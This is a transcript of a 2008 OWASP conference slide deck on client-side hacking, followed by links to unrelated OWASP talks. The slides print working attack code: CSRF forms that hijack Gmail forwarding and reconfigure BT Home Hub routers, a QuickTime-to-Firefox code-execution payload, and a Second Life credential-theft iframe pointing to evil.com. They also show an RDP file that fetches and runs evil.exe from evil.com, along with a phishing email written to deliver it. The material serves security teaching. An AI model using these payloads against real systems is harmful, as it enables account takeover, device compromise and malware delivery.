owasp belgium appsec 2008 conference
play

OWASP BELGIUM APPSEC 2008 CONFERENCE pdp information security - PowerPoint PPT Presentation

Nov 06, 2022 •110 likes •766 views

OWASP BELGIUM APPSEC 2008 CONFERENCE pdp information security researcher, hacker, founder of GNUCITIZEN SALES PITCH Cutting-edge Think Tank THERE ISN'T ANY! CLIENT-SIDE SECURITY Overview of various Client-Side Hacking Tricks and

  2. OWASP BELGIUM APPSEC 2008 CONFERENCE

  3. pdp information security researcher, hacker, founder of GNUCITIZEN

  4. SALES PITCH

  5. Cutting-edge Think Tank

  6.  THERE ISN'T ANY!

  8. CLIENT-SIDE SECURITY Overview of various Client-Side Hacking Tricks and Techniques

  9. OBJECTIVES  I was planning to...  Research Design Issues.  Innovate.  Mix & Match Ideas.  I am not a bug hunter, therefore...  Concentrate on the practicalities.  Look for things I could use in my work.  Have fun.

  10. CLIENTS & SERVERS  Symbiosis  Clients & Servers are in a constant interaction.  This interaction comes in various forms.  Their security model is shared.

  11. THE GMAIL HIJACK TECHNIQUE

  12. THE GMAIL HIJACK TECHNIQUE

  13. THE GMAIL HIJACK TECHNIQUE

  14. THE GMAIL HIJACK TECHNIQUE  Via a CSRF Redirection Utility http://www.gnucitizen.org/util/csrf  ?_method=POST&_enctype=multipart/form-data &_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf &cf2_emc=true &cf2_email=evilinbox@mailinator.com &cf1_from &cf1_to &cf1_subj &cf1_has &cf1_hasnot &cf1_attach=true &tfi&s=z &irf=on&nvp_bu_cftb=Create%20Filter

  15. THE GMAIL HIJACK TECHNIQUE  HTML Code <html>  <body> <form name="form" method="POST" enctype="multipart/form-data" action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf"> <input type="hidden" name="cf2_emc" value="true"/> <input type="hidden" name="cf2_email" value="evilinbox@mailinator.com"/> <input type="hidden" name="cf1_from" value=""/> <input type="hidden" name="cf1_to" value=""/> <input type="hidden" name="cf1_subj" value=""/> <input type="hidden" name="cf1_has" value=""/><input type="hidden" name="cf1_hasnot" value=""/> <input type="hidden" name="cf1_attach" value="true"/> <input type="hidden" name="tfi" value=""/> <input type="hidden" name="s" value="z"/> <input type="hidden" name="irf" value="on"/> <input type="hidden" name="nvp_bu_cftb" value="Create Filter"/> </form> <script>form.submit()</script> </body> </html>

  16. SOMEONE GOT HACKED It is unfortunate, but it gives us a good case study!

  17. PWNING BT HOME HUB  Enable Remote Assistance <html>  <!-- ras.html --> <head></head> <body> <form name='raccess' action='http://192.168.1.254/cgi/b/ras//?ce=1&be=1&l0=5&l1=5' method='post'> <input type='hidden' name='0' value='31'> <input type='hidden' name='1' value=''> <input type='hidden' name='30' value='12345678'> <!-- <input type='submit' value="own it!"> --> </form> <script>document.raccess.submit();</script> </body> </html>

  18. PWNING BT HOME HUB  Disable Wireless Connectivity <html>  <body> <!-- disable_wifi_interface.html --> <!-- POST /cgi/b/_wli_/cfg/?ce=1&be=1&l0=4&l1=0&name= HTTP/1.1 0=10&1=&32=&33=&34=2&35=1&45=11&47=1 --> <form action="http://192.168.1.254/cgi/b/_wli_/cfg//" method="post"> <input type="hidden" name="0" value="10"> <input type="hidden" name="1" value=""> <input type="hidden" name="32" value=""> <input type="hidden" name="33" value=""> <input type="hidden" name="34" value="2"> <input type="hidden" name="35" value="1"> <input type="hidden" name="45" value="11"> <input type="hidden" name="47" value="1"> </form> <script>document.forms[0].submit();</script> </body> </html>

  19. PWNING BT HOME HUB  Call Jacking POST http://api.home/cgi/b/_voip_/stats//?ce=1&be=0&l0=-1&l1=-  1&name= 0=30&1= 00390669893461  Is that the Vatican number?

  20. PWNED!!! Thanks to AP!!!

  21. PWNED!!! SNOM .mario hacked Snom

  22. CROSS-SITE FILE UPLOAD ATTACKS  The Flash Method <mx:Application xmlns:mx="http://www.adobe.com/2006/mxml"  creationComplete="onAppInit()"> <mx:Script> /* by Petko D. Petkov; pdp * GNUCITIZEN **/ import flash.net.*; private function onAppInit():void { var r:URLRequest = new URLRequest('http://victim.com/upload.php'); r.method = 'POST'; r.data = unescape('----------------------------- 109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22gc.txt%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0AHi from GNUCITIZEN%21%0D%0A-----------------------------109092118919201%0D%0AContent- Disposition%3A form-data%3B name%3D%22submit%22%0D%0A%0D%0ASubmit Query%0D%0A-----------------------------109092118919201--%0A'); r.contentType = 'multipart/form-data; boundary=---------------------------109092118919201'; navigateToURL(r, '_self'); } </mx:Script> </mx:Application>

  23. CROSS-SITE FILE UPLOAD ATTACKS  The FORM Method <form method="post" action="http://kuza55.awardspace.com/files.php"  enctype="multipart/form-data"> <textarea name='file"; filename="filename.ext Content-Type: text/plain; '>Arbitrary File Contents</textarea> <input type="submit" value='Send "File"' /> </form>  by kuza55  Opera doesn't like it!

  24. QUICKTIME PWNS FIREFOX  QuickTime Media Links <?xml version="1.0">  <?quicktime type="application/x-quicktime-media-link"?> <embed src="Sample.mov" autoplay="true"/>  Supported File Extensions 3g2, 3gp, 3gp2, 3gpp, AMR, aac, adts, aif, aifc, aiff, amc, au,  avi, bwf, caf, cdda, cel, flc, fli, gsm, m15, m1a, m1s, m1v, m2a, m4a, m4b, m4p, m4v, m75, mac, mov, mp2, mp3, mp4, mpa, mpeg, mpg, mpm, mpv, mqv, pct, pic, pict, png, pnt, pntg, qcp, qt, qti, qt

  25. QUICKTIME PWNS FIREFOX  The Exploit <?xml version="1.0">  <?quicktime type="application/x-quicktime-media-link"?> <embed src="a.mp3" autoplay="true" qtnext=" -chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].cre ateInstance(Components.interfaces.nsILocalFile);file.initWithPath(' c:\\windows\\system32\\calc.exe');process=Components.classes['@mozi lla.org/process/util;1'].createInstance(Components.interfaces.nsIPr ocess);process.init(file);process.run(true,[],0);void(0); "/>

  26. QUICKTIME PWNS FIREFOX  The Exploit  qtnext=" -chrome javascript:...

  27. IE PWNS SECOND LIFE  The Exploit  <iframe src=' secondlife://" -autologin -loginuri "http://evil.com/sl/record- login.php' ></iframe>

  28. IE PWNS SECOND LIFE  Avatar Theft [HTTP_RAW_POST_DATA] => <methodCall>  <methodName>login_to_simulator</methodName> … … … <member> <name>passwd</name> <value> <string>$1$ [MD5 Hash of the password here] </string> </value> </member> … … … </methodCall>

  29. IE PWNS SECOND LIFE  …with that  <?php ob_start(); print_r($GLOBALS); error_log(ob_get_contents(), 0); ob_end_clean(); ?>

  30. ALL YOUR AVATARS ARE BELONG TO US!!!

  31. CITRIX/RDP COMMAND FIXATION ATTACKS  CITRIX ICA [WFClient]  Version=1 [ApplicationServers] Connection To Citrix Server= [Connection To Citrix Server] InitialProgram= some command here Address= 172.16.3.191 ScreenPercent=0  Microsoft RDP screen mode id:i:1  desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s: 172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s: some command here shell working directory:s:C:\ bitmapcachepersistenable:i:1

  32. CITRIX/RDP COMMAND FIXATION ATTACKS  The Malicious One  screen mode id:i:1 desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s: 172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s: cmd.exe /C “tftp -i evil.com GET evil.exe evil.exe & evil.exe” shell working directory:s:C:\ bitmapcachepersistenable:i:1

  33. Hello John, This is Tim from Tech Department. I was informed that you have some problems with your remote desktop connectivity. I’ve attached a modified RDP file you can tryout and see if it works. Just double click on the file and login. Your domain credentials should work. Let me know if you have any problems. Tim O’Brian Tech Department

Recommend

Chapter Meeting OWASP_Geneva 2015/10/19 About Me Thomas Hofer Java DEV / AppSec

Chapter Meeting OWASP_Geneva 2015/10/19 About Me Thomas Hofer Java DEV / AppSec

OWASP Dependency-Check Chapter Meeting OWASP_Geneva 2015/10/19 About Me Thomas Hofer Java DEV / AppSec OWASP Geneva Board State of Geneva @thhofer thomas.hofer@owasp.org Outline Context How it works / Integration

335 views • 9 slides
Welcome to the OWASP Toronto Meetup Hello, and happy 2018! Announcement: OWASP Top 10 2017

Welcome to the OWASP Toronto Meetup Hello, and happy 2018! Announcement: OWASP Top 10 2017

Welcome to the OWASP Toronto Meetup Hello, and happy 2018! Announcement: OWASP Top 10 2017 Changes between 2013 and 2017 Hi, I am X. How do I get into AppSec/Security? OWASP Toronto Chapter January 17, 2018 Topics Overviews, Career Paths,

372 views • 36 slides
OpenSAMM Software Assurance Maturity Model Seba Deleersnyder seba@owasp.org OWASP Foundation

OpenSAMM Software Assurance Maturity Model Seba Deleersnyder seba@owasp.org OWASP Foundation

The OWASP Foundation Libre Software Meeting Brussels 10-July-2013 http://www.owasp.org OpenSAMM Software Assurance Maturity Model Seba Deleersnyder seba@owasp.org OWASP Foundation Board Member OWASP Belgium Chapter Leader SAMM project

682 views • 43 slides
New Privacy in Android 11 and OWASP Mobile Security Albert Hsieh OWASP 200

New Privacy in Android 11 and OWASP Mobile Security Albert Hsieh OWASP 200

New Privacy in Android 11 and OWASP Mobile Security Albert Hsieh OWASP 200 OWASP Flagship Projects Tool Projects OWASP Amass OWASP CSRFGuard OWASP Defectdojo OWASP Dependency-Check OWASP Dependency-Track

751 views • 55 slides
OWASP Daniel Brzozowski daniel@brzozowski.biz Agenda 1. Few words about OWASP 2. Owasp resources

OWASP Daniel Brzozowski daniel@brzozowski.biz Agenda 1. Few words about OWASP 2. Owasp resources

OWASP Daniel Brzozowski daniel@brzozowski.biz Agenda 1. Few words about OWASP 2. Owasp resources 3. Setting up workstations 4. OWASP WebScarab/OWASP WebScarab-NG 5. O2 Platform About me In London since October 2010 Before that MCPD, MCTS,

747 views • 58 slides
OWASP Top Ten Kirk Jackson OWASP NZ RedShield https://www.meetup.com/ kirk@pageofwords.com

OWASP Top Ten Kirk Jackson OWASP NZ RedShield https://www.meetup.com/ kirk@pageofwords.com

Introduction to the OWASP Top Ten Kirk Jackson OWASP NZ RedShield https://www.meetup.com/ kirk@pageofwords.com OWASP-Wellington/ http://hack-ed.com www.owasp.org.nz Recordings: @kirkj @owaspnz https://goo.gl/a2VSG2 What is OWASP? Open

880 views • 45 slides
Cookie Security Myths and Misconceptions David Johansson OWASP London 30 Nov. 2017 About Me

Cookie Security Myths and Misconceptions David Johansson OWASP London 30 Nov. 2017 About Me

Cookie Security Myths and Misconceptions David Johansson OWASP London 30 Nov. 2017 About Me David Johansson (@securitybits) Security consultant with 10 years in AppSec Helping clients design and build secure software Develop

613 views • 32 slides
OWASP Foundation OWASP does not endorse or recommend commercial products or services , allowing our

OWASP Foundation OWASP does not endorse or recommend commercial products or services , allowing our

OWASP Foundation OWASP does not endorse or recommend commercial products or services , allowing our community to remain vendor neutral with the collective wisdom of the best minds in software security worldwide. OWASP Foundation, NYC Chapter

382 views • 23 slides
Broken Authentication: What it means, and what you can do hassan.abudu@owasp.org OWASP Top 10

Broken Authentication: What it means, and what you can do hassan.abudu@owasp.org OWASP Top 10

Broken Authentication: What it means, and what you can do hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017 Rank Name 1 Injection 2 Broken Authentication 3 Sensitive Data Exposure 4 XML External Entities 5 Broken Access

209 views • 6 slides
Insecurity in Informaton Technology Tanya Janca Tanya.Janca@owasp.org OWASP Otawa Chapter

Insecurity in Informaton Technology Tanya Janca Tanya.Janca@owasp.org OWASP Otawa Chapter

Insecurity in Informaton Technology Tanya Janca Tanya.Janca@owasp.org OWASP Otawa Chapter Leader OWASP DevSlop Project Leader @SheHacksPurple About Me The Im Qualifed Slide Tanya Janca: Applicaton security evangelist, web

1k views • 82 slides
Web Attacks Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web

Web Attacks Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web

Web Attacks Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web Security Risks https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010-2017%20(en).pdf Today

998 views • 78 slides
Introduction to OWASP Mobile Application Security Verification Standard (MASVS) OWASP Geneva

Introduction to OWASP Mobile Application Security Verification Standard (MASVS) OWASP Geneva

Introduction to OWASP Mobile Application Security Verification Standard (MASVS) OWASP Geneva 12/12/2016 Jrmy MATOS whois securingapps Developer background Spent last 10 years working between Geneva and Lausanne on security products

867 views • 22 slides
SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017

SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017

SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017 Rank Name 1 Injection 2 Broken Authentication 3 Sensitive Data Exposure 4 XML External Entities 5 Broken Access Control 6 Security

682 views • 8 slides
Web Attacks Nadia Heninger and Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten

Web Attacks Nadia Heninger and Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten

Web Attacks Nadia Heninger and Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web Security Risks https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010-2017%20(en).pdf Today

916 views • 87 slides
From Dev to Security Rey Bango (@reybango) AppSec is hard Credit:

From Dev to Security Rey Bango (@reybango) AppSec is hard Credit:

From Dev to Security Rey Bango (@reybango) AppSec is hard Credit: https://imgur.com/user/PipePistoleer Implicit trust On average, each Web application that Positive Technologies inspected contained 33 vulnerabilities . Of those, six were high-

763 views • 47 slides
Introduction to Mobile Security Testing Approaches and Examples using OWASP MSTG OWASP German

Introduction to Mobile Security Testing Approaches and Examples using OWASP MSTG OWASP German

Introduction to Mobile Security Testing Approaches and Examples using OWASP MSTG OWASP German Day 20.11.2018 Carlos Holguera $ whoami Carlos Holguera [olera] Security Engineer working at ESCRYPT GmbH since 2012 Area of expertise:

790 views • 56 slides
Surrogate Dependencies (in NodeJS) @DinisCruz London, 29th Sep 2016 Me Developer for 25

Surrogate Dependencies (in NodeJS) @DinisCruz London, 29th Sep 2016 Me Developer for 25

Surrogate Dependencies (in NodeJS) @DinisCruz London, 29th Sep 2016 Me Developer for 25 years AppSec for 13 years Day jobs: Leader OWASP O2 Platform project Application Security Training JBI Training, others Part of

651 views • 32 slides
Interim Results 2008 Belgium Denmark Finland France Germany Iberia

Interim Results 2008 Belgium Denmark Finland France Germany Iberia

Interim Results 2008 Belgium Denmark Finland France Germany Iberia Italy Netherlands Norway Sweden UK Richard Moon Chairman 2 Belgium Denmark Finland France Germany

491 views • 25 slides
UC.yber; OWASP Chapter The University of Cincinnati's Official Cybersecurity Chapter What is

UC.yber; OWASP Chapter The University of Cincinnati's Official Cybersecurity Chapter What is

UC.yber; OWASP Chapter The University of Cincinnati's Official Cybersecurity Chapter What is OWASP? Open Web Application Security Project Non-profit organization focused on improving security of software. They have some GREAT info on

372 views • 9 slides
NodeJS Security Still unsafe at most speeds @DinisCruz London, 29th Sep 2016 Me Developer

NodeJS Security Still unsafe at most speeds @DinisCruz London, 29th Sep 2016 Me Developer

NodeJS Security Still unsafe at most speeds @DinisCruz London, 29th Sep 2016 Me Developer for 25 years AppSec for 13 years Day jobs: Leader OWASP O2 Platform project Application Security Training for JBI Training Part of

611 views • 49 slides
Demonstration activities in Belgium Carlo Mol, VITO (Belgium) Outline Belgium :

Demonstration activities in Belgium Carlo Mol, VITO (Belgium) Outline Belgium :

Transatlantic Workshop on Electric Vehicles and Grid Connectivity Session D: Effective Policies for Vehicle Demonstration &amp; Deployment Demonstration activities in Belgium Carlo Mol, VITO (Belgium) Outline Belgium : Automotive

345 views • 18 slides
OWASP Most Critical Web Application Security Vulnerabilities Introduction 2 Purpose of

OWASP Most Critical Web Application Security Vulnerabilities Introduction 2 Purpose of

OWASP Most Critical Web Application Security Vulnerabilities Introduction 2 Purpose of Session: - Provide Overview Web Application Security Threats and Defense Using the Open Web Application Security Project (OWASP) Top List, we

830 views • 39 slides
OWASP Summit 2017 Why, how, what, where (v0.9, Jan 2017) Close your eyes Imagine a place

OWASP Summit 2017 Why, how, what, where (v0.9, Jan 2017) Close your eyes Imagine a place

OWASP Summit 2017 Why, how, what, where (v0.9, Jan 2017) Close your eyes Imagine a place where (some of ) the best Application Security and OWASP minds come together to collaborate and work a meeting of minds focused on solving

770 views • 37 slides
Security Vulnerabilities Decomposition Katy Anton OWASP Top 10 @KatyAnton When the report is

Security Vulnerabilities Decomposition Katy Anton OWASP Top 10 @KatyAnton When the report is

Security Vulnerabilities Decomposition Katy Anton OWASP Top 10 @KatyAnton When the report is published @KatyAnton Katy Anton Software development background Project co-leader for OWASP Top 10 Proactive Controls (@OWASPControls)

1.21k views • 45 slides

More recommend